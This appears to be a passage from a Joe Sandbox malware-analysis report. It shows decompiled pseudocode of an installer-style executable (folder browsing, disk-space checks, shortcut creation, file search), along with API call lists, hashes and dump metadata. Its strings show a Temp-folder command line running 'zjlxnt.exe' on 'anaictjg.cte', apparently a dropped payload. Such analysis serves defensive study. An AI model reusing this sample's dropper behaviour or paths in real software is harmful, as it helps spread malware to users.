                                                          				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                          				if(_a8 == 0x40b) {
                                                          					E00405CAC(0x3fb, _t146);
                                                          					E004068EF(_t146);
                                                          				}
                                                          				_t167 = _a4;
                                                          				if(_a8 != 0x110) {
                                                          					L8:
                                                          					if(_a8 != 0x111) {
                                                          						L20:
                                                          						if(_a8 == 0x40f) {
                                                          							L22:
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							E00405CAC(0x3fb, _t146);
                                                          							if(E0040603F(_t186, _t146) == 0) {
                                                          								_v8 = 1;
                                                          							}
                                                          							E00406668(0x421718, _t146);
                                                          							_t87 = E00406A35(1);
                                                          							_v16 = _t87;
                                                          							if(_t87 == 0) {
                                                          								L30:
                                                          								E00406668(0x421718, _t146);
                                                          								_t89 = E00405FE2(0x421718);
                                                          								_t158 = 0;
                                                          								if(_t89 != 0) {
                                                          									 *_t89 = 0;
                                                          								}
                                                          								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                          									goto L35;
                                                          								} else {
                                                          									_t169 = 0x400;
                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                          									asm("cdq");
                                                          									_v48 = _t109;
                                                          									_v44 = _t156;
                                                          									_v12 = 1;
                                                          									goto L36;
                                                          								}
                                                          							} else {
                                                          								_t159 = 0;
                                                          								if(0 == 0x421718) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                          									if(_t114 != 0) {
                                                          										break;
                                                          									}
                                                          									if(_t159 != 0) {
                                                          										 *_t159 =  *_t159 & _t114;
                                                          									}
                                                          									_t160 = E00405F83(0x421718);
                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                          									_t159 = _t160;
                                                          									 *_t159 = 0x5c;
                                                          									if(_t159 != 0x421718) {
                                                          										continue;
                                                          									} else {
                                                          										goto L30;
                                                          									}
                                                          								}
                                                          								_t150 = _v44;
                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                          								_v44 = _t150 >> 0xa;
                                                          								_v12 = 1;
                                                          								_t158 = 0;
                                                          								__eflags = 0;
                                                          								L35:
                                                          								_t169 = 0x400;
                                                          								L36:
                                                          								_t95 = E00404F52(5);
                                                          								if(_v12 != _t158) {
                                                          									_t197 = _v44;
                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                          										_v8 = 2;
                                                          									}
                                                          								}
                                                          								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                          									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                          									if(_v12 == _t158) {
                                                          										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                          									} else {
                                                          										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                          									}
                                                          								}
                                                          								_t96 = _v8;
                                                          								 *0x42a304 = _t96;
                                                          								if(_t96 == _t158) {
                                                          									_v8 = E0040140B(7);
                                                          								}
                                                          								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                          									_v8 = _t158;
                                                          								}
                                                          								E004045E6(0 | _v8 == _t158);
                                                          								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                          									E00404A0E();
                                                          								}
                                                          								 *0x423738 = _t158;
                                                          								goto L53;
                                                          							}
                                                          						}
                                                          						_t186 = _a8 - 0x405;
                                                          						if(_a8 != 0x405) {
                                                          							goto L53;
                                                          						}
                                                          						goto L22;
                                                          					}
                                                          					_t118 = _a12 & 0x0000ffff;
                                                          					if(_t118 != 0x3fb) {
                                                          						L12:
                                                          						if(_t118 == 0x3e9) {
                                                          							_t152 = 7;
                                                          							memset( &_v76, 0, _t152 << 2);
                                                          							_v80 = _t167;
                                                          							_v72 = 0x423748;
                                                          							_v60 = E00404E0B;
                                                          							_v56 = _t146;
                                                          							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                          							_t122 =  &_v80;
                                                          							_v64 = 0x41;
                                                          							__imp__SHBrowseForFolderW(_t122);
                                                          							if(_t122 == 0) {
                                                          								_a8 = 0x40f;
                                                          							} else {
                                                          								__imp__CoTaskMemFree(_t122);
                                                          								E00405F37(_t146);
                                                          								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                          								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == 0x435800) {
                                                          									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                          									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                          										lstrcatW(_t146, 0x428200);
                                                          									}
                                                          								}
                                                          								 *0x423738 =  *0x423738 + 1;
                                                          								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					if(_a12 >> 0x10 != 0x300) {
                                                          						goto L53;
                                                          					}
                                                          					_a8 = 0x40f;
                                                          					goto L12;
                                                          				} else {
                                                          					_t166 = GetDlgItem(_t167, 0x3fb);
                                                          					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                          						E00405F37(_t146);
                                                          					}
                                                          					 *0x429238 = _t167;
                                                          					SetWindowTextW(_t166, _t146);
                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                          					_push(1);
                                                          					E004045C4(_t167);
                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          					_push(0x14);
                                                          					E004045C4(_t167);
                                                          					E004045F9(_t166);
                                                          					_t138 = E00406A35(8);
                                                          					if(_t138 == 0) {
                                                          						L53:
                                                          						return E0040462B(_a8, _a12, _a16);
                                                          					} else {
                                                          						 *_t138(_t166, 1);
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}













































                                                          0x00404ab5
                                                          0x00404abb
                                                          0x00404ac1
                                                          0x00404ace
                                                          0x00404adc
                                                          0x00404adf
                                                          0x00404ae7
                                                          0x00404aed
                                                          0x00404aed
                                                          0x00404af9
                                                          0x00404afc
                                                          0x00404b6a
                                                          0x00404b71
                                                          0x00404c48
                                                          0x00404c4f
                                                          0x00404c5e
                                                          0x00404c5e
                                                          0x00404c62
                                                          0x00404c6c
                                                          0x00404c79
                                                          0x00404c7b
                                                          0x00404c7b
                                                          0x00404c89
                                                          0x00404c90
                                                          0x00404c97
                                                          0x00404c9a
                                                          0x00404cd6
                                                          0x00404cd8
                                                          0x00404cde
                                                          0x00404ce3
                                                          0x00404ce7
                                                          0x00404ce9
                                                          0x00404ce9
                                                          0x00404d05
                                                          0x00000000
                                                          0x00404d07
                                                          0x00404d0a
                                                          0x00404d18
                                                          0x00404d1e
                                                          0x00404d1f
                                                          0x00404d22
                                                          0x00404d25
                                                          0x00000000
                                                          0x00404d25
                                                          0x00404c9c
                                                          0x00404c9e
                                                          0x00404ca2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404ca4
                                                          0x00404ca4
                                                          0x00404cb1
                                                          0x00404cb6
                                                          0x00000000
                                                          0x00000000
                                                          0x00404cba
                                                          0x00404cbc
                                                          0x00404cbc
                                                          0x00404cc5
                                                          0x00404cc7
                                                          0x00404ccc
                                                          0x00404ccf
                                                          0x00404cd4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404cd4
                                                          0x00404d31
                                                          0x00404d3b
                                                          0x00404d3e
                                                          0x00404d41
                                                          0x00404d48
                                                          0x00404d48
                                                          0x00404d4a
                                                          0x00404d4a
                                                          0x00404d4f
                                                          0x00404d51
                                                          0x00404d59
                                                          0x00404d60
                                                          0x00404d62
                                                          0x00404d6d
                                                          0x00404d6d
                                                          0x00404d62
                                                          0x00404d7d
                                                          0x00404d87
                                                          0x00404d8f
                                                          0x00404daa
                                                          0x00404d91
                                                          0x00404d9a
                                                          0x00404d9a
                                                          0x00404d8f
                                                          0x00404daf
                                                          0x00404db4
                                                          0x00404db9
                                                          0x00404dc2
                                                          0x00404dc2
                                                          0x00404dcb
                                                          0x00404dcd
                                                          0x00404dcd
                                                          0x00404dd9
                                                          0x00404de1
                                                          0x00404deb
                                                          0x00404deb
                                                          0x00404df0
                                                          0x00000000
                                                          0x00404df0
                                                          0x00404c9a
                                                          0x00404c51
                                                          0x00404c58
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404c58
                                                          0x00404b77
                                                          0x00404b80
                                                          0x00404b9a
                                                          0x00404b9f
                                                          0x00404ba9
                                                          0x00404bb0
                                                          0x00404bbc
                                                          0x00404bbf
                                                          0x00404bc2
                                                          0x00404bc9
                                                          0x00404bd1
                                                          0x00404bd4
                                                          0x00404bd8
                                                          0x00404bdf
                                                          0x00404be7
                                                          0x00404c41
                                                          0x00404be9
                                                          0x00404bea
                                                          0x00404bf1
                                                          0x00404bfb
                                                          0x00404c03
                                                          0x00404c10
                                                          0x00404c24
                                                          0x00404c28
                                                          0x00404c28
                                                          0x00404c24
                                                          0x00404c2d
                                                          0x00404c3a
                                                          0x00404c3a
                                                          0x00404be7
                                                          0x00000000
                                                          0x00404b9f
                                                          0x00404b8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404b93
                                                          0x00000000
                                                          0x00404afe
                                                          0x00404b0b
                                                          0x00404b14
                                                          0x00404b21
                                                          0x00404b21
                                                          0x00404b28
                                                          0x00404b2e
                                                          0x00404b37
                                                          0x00404b3a
                                                          0x00404b3d
                                                          0x00404b45
                                                          0x00404b48
                                                          0x00404b4b
                                                          0x00404b51
                                                          0x00404b58
                                                          0x00404b5f
                                                          0x00404df6
                                                          0x00404e08
                                                          0x00404b65
                                                          0x00404b68
                                                          0x00000000
                                                          0x00404b68
                                                          0x00404b5f

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00404B04
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                          • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00423748,00000000,?,?), ref: 00404C1C
                                                          • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte), ref: 00404C28
                                                          • SetDlgItemTextW.USER32 ref: 00404C3A
                                                            • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                            • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                            • Part of subcall function 004068EF: CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                          • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                            • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                            • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                            • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte$A$H7B
                                                          • API String ID: 2624150263-1941983528
                                                          • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                          • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                          • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                          • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 67%
                                                          			E004021AA() {
                                                          				signed int _t52;
                                                          				void* _t56;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr* _t62;
                                                          				intOrPtr* _t64;
                                                          				intOrPtr* _t66;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t74;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr* _t78;
                                                          				intOrPtr* _t80;
                                                          				void* _t83;
                                                          				intOrPtr* _t91;
                                                          				signed int _t101;
                                                          				signed int _t105;
                                                          				void* _t107;
                                                          
                                                          				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                          				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                          				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                          				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                          				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                          				_t52 =  *(_t107 - 0x20);
                                                          				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                          				_t101 = _t52 & 0x00008000;
                                                          				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                          				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                          				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                          					E00402DA6(0x21);
                                                          				}
                                                          				_t56 = _t107 + 8;
                                                          				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                          				if(_t56 < _t83) {
                                                          					L14:
                                                          					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                          					_push(0xfffffff0);
                                                          				} else {
                                                          					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                          					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                          					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                          					if(_t61 >= _t83) {
                                                          						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                          						if(_t101 == _t83) {
                                                          							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                          							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                                                          						}
                                                          						if(_t105 != _t83) {
                                                          							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                          							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                          						}
                                                          						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                          						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                          						if( *_t91 != _t83) {
                                                          							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                          							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                          						}
                                                          						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                          						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                          						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                          						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                          							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                          							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                          						}
                                                          						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                          						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          					}
                                                          					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                          					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                          					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                          						_push(0xfffffff4);
                                                          					} else {
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				E00401423();
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                          				return 0;
                                                          			}






















                                                          0x004021b3
                                                          0x004021bd
                                                          0x004021c7
                                                          0x004021d1
                                                          0x004021dc
                                                          0x004021df
                                                          0x004021f9
                                                          0x004021fc
                                                          0x00402202
                                                          0x00402205
                                                          0x0040220f
                                                          0x00402213
                                                          0x00402213
                                                          0x00402218
                                                          0x00402229
                                                          0x00402231
                                                          0x004022e8
                                                          0x004022e8
                                                          0x004022ef
                                                          0x00402237
                                                          0x00402237
                                                          0x00402246
                                                          0x0040224a
                                                          0x0040224d
                                                          0x00402253
                                                          0x00402261
                                                          0x00402264
                                                          0x00402266
                                                          0x00402271
                                                          0x00402271
                                                          0x00402276
                                                          0x00402278
                                                          0x0040227f
                                                          0x0040227f
                                                          0x00402282
                                                          0x0040228b
                                                          0x0040228e
                                                          0x00402294
                                                          0x00402296
                                                          0x004022a0
                                                          0x004022a0
                                                          0x004022a3
                                                          0x004022ac
                                                          0x004022af
                                                          0x004022b8
                                                          0x004022be
                                                          0x004022c0
                                                          0x004022ce
                                                          0x004022ce
                                                          0x004022d1
                                                          0x004022d7
                                                          0x004022d7
                                                          0x004022da
                                                          0x004022e0
                                                          0x004022e6
                                                          0x004022fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004022e6
                                                          0x004022f1
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID:
                                                          • API String ID: 542301482-0
                                                          • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                          • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                          • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                          • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E0040290B(short __ebx, short* __edi) {
                                                          				void* _t21;
                                                          
                                                          				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                          					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                          					_push(_t21 - 0x2b0);
                                                          					_push(__edi);
                                                          					E00406668();
                                                          				} else {
                                                          					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                          					 *__edi = __ebx;
                                                          					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                          				return 0;
                                                          			}




                                                          0x00402923
                                                          0x0040293e
                                                          0x00402949
                                                          0x0040294a
                                                          0x00402a94
                                                          0x00402925
                                                          0x00402928
                                                          0x0040292b
                                                          0x0040292e
                                                          0x0040292e
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                          • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                          • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                          • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct HWND__* _v12;
                                                          				long _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v28;
                                                          				signed char* _v32;
                                                          				int _v36;
                                                          				signed int _v44;
                                                          				int _v48;
                                                          				signed int* _v60;
                                                          				signed char* _v64;
                                                          				signed int _v68;
                                                          				long _v72;
                                                          				void* _v76;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t198;
                                                          				intOrPtr _t201;
                                                          				long _t207;
                                                          				signed int _t211;
                                                          				signed int _t222;
                                                          				void* _t225;
                                                          				void* _t226;
                                                          				int _t232;
                                                          				long _t237;
                                                          				long _t238;
                                                          				signed int _t239;
                                                          				signed int _t245;
                                                          				signed int _t247;
                                                          				signed char _t248;
                                                          				signed char _t254;
                                                          				void* _t258;
                                                          				void* _t260;
                                                          				signed char* _t278;
                                                          				signed char _t279;
                                                          				long _t284;
                                                          				struct HWND__* _t291;
                                                          				signed int* _t292;
                                                          				int _t293;
                                                          				long _t294;
                                                          				signed int _t295;
                                                          				void* _t297;
                                                          				long _t298;
                                                          				int _t299;
                                                          				signed int _t300;
                                                          				signed int _t303;
                                                          				signed int _t311;
                                                          				signed char* _t319;
                                                          				int _t324;
                                                          				void* _t326;
                                                          
                                                          				_t291 = _a4;
                                                          				_v12 = GetDlgItem(_t291, 0x3f9);
                                                          				_v8 = GetDlgItem(_t291, 0x408);
                                                          				_t326 = SendMessageW;
                                                          				_v24 =  *0x42a288;
                                                          				_v28 =  *0x42a270 + 0x94;
                                                          				if(_a8 != 0x110) {
                                                          					L23:
                                                          					if(_a8 != 0x405) {
                                                          						_t301 = _a16;
                                                          					} else {
                                                          						_a12 = 0;
                                                          						_t301 = 1;
                                                          						_a8 = 0x40f;
                                                          						_a16 = 1;
                                                          					}
                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                          						_v16 = _t301;
                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                          							if(( *0x42a279 & 0x00000002) != 0) {
                                                          								L41:
                                                          								if(_v16 != 0) {
                                                          									_t237 = _v16;
                                                          									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                          										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                          									}
                                                          									_t238 = _v16;
                                                          									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                          										_t301 = _v24;
                                                          										_t239 =  *(_t238 + 0x5c);
                                                          										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                          										} else {
                                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L48;
                                                          							}
                                                          							if(_a8 == 0x413) {
                                                          								L33:
                                                          								_t301 = 0 | _a8 != 0x00000413;
                                                          								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                          								_t295 = _t245;
                                                          								if(_t295 >= 0) {
                                                          									_t94 = _v24 + 8; // 0x8
                                                          									_t301 = _t245 * 0x818 + _t94;
                                                          									_t247 =  *_t301;
                                                          									if((_t247 & 0x00000010) == 0) {
                                                          										if((_t247 & 0x00000040) == 0) {
                                                          											_t248 = _t247 ^ 0x00000001;
                                                          										} else {
                                                          											_t254 = _t247 ^ 0x00000080;
                                                          											if(_t254 >= 0) {
                                                          												_t248 = _t254 & 0x000000fe;
                                                          											} else {
                                                          												_t248 = _t254 | 0x00000001;
                                                          											}
                                                          										}
                                                          										 *_t301 = _t248;
                                                          										E0040117D(_t295);
                                                          										_a12 = _t295 + 1;
                                                          										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                          										_a8 = 0x40f;
                                                          									}
                                                          								}
                                                          								goto L41;
                                                          							}
                                                          							_t301 = _a16;
                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                          								goto L41;
                                                          							}
                                                          							goto L33;
                                                          						} else {
                                                          							goto L48;
                                                          						}
                                                          					} else {
                                                          						L48:
                                                          						if(_a8 != 0x111) {
                                                          							L56:
                                                          							if(_a8 == 0x200) {
                                                          								SendMessageW(_v8, 0x200, 0, 0);
                                                          							}
                                                          							if(_a8 == 0x40b) {
                                                          								_t225 =  *0x42372c;
                                                          								if(_t225 != 0) {
                                                          									ImageList_Destroy(_t225);
                                                          								}
                                                          								_t226 =  *0x423740;
                                                          								if(_t226 != 0) {
                                                          									GlobalFree(_t226);
                                                          								}
                                                          								 *0x42372c = 0;
                                                          								 *0x423740 = 0;
                                                          								 *0x42a2c0 = 0;
                                                          							}
                                                          							if(_a8 != 0x40f) {
